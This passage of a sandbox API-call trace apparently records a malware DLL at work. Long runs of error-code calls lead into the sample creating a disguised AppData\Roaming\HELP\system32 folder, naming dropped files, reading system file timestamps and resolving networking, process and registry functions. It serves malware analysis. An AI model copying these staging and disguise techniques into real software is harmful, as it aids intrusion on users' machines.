(dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.610] SetLastError (dwErrCode=0x0) [0032.610] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.611] SetLastError (dwErrCode=0x0) [0032.611] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.612] SetLastError (dwErrCode=0x0) [0032.612] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.613] SetLastError (dwErrCode=0x0) [0032.613] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.614] GetLastError () returned 0x0 [0032.614] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.615] SetLastError (dwErrCode=0x0) [0032.615] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.616] GetLastError () returned 0x0 [0032.616] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.617] SetLastError (dwErrCode=0x0) [0032.617] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.618] SetLastError (dwErrCode=0x0) [0032.618] GetLastError () returned 0x0 [0032.625] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.626] SetLastError (dwErrCode=0x0) [0032.626] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.627] SetLastError (dwErrCode=0x0) [0032.627] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.628] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.628] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.628] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.628] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.628] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.628] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.628] GetLastError () returned 0x0 [0032.628] SetLastError (dwErrCode=0x0) [0032.629] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.629] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.629] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.630] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8e8 | out: lpSystemTimeAsFileTime=0x26f8e8*(dwLowDateTime=0xe12b6910, dwHighDateTime=0x1d3dfba)) [0032.631] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f820, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.631] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f708, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetLastError () returned 0x0 [0032.631] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.631] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.631] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.631] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.631] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.631] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.632] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.632] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.632] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.632] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.632] GetLastError () returned 0xb7 [0032.632] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.632] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.632] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.632] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.632] wsprintfA (in: param_1=0x26f588, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.632] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.632] wsprintfA (in: param_1=0x26f484, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.632] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.632] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.632] CloseHandle (hObject=0x74) returned 1 [0032.632] GetLastError () returned 0x0 [0032.632] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.632] GetLastError () returned 0x0 [0032.632] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.633] GetSystemDirectoryA (in: lpBuffer=0x26f588, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.633] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.633] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.633] CloseHandle (hObject=0x74) returned 1 [0032.633] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.633] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.633] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.635] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.635] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.635] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.635] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.635] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.635] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.635] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.635] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.635] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.636] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.637] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.637] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.637] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.637] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.637] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.637] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.637] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.637] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.637] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.637] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.638] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.638] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.638] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.638] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.638] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.638] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.638] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.638] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.638] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.638] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.638] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.638] Entry () [0032.638] GetMessageA (lpMsg=0x26fc0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 148 os_tid = 0xddc [0036.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.550] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 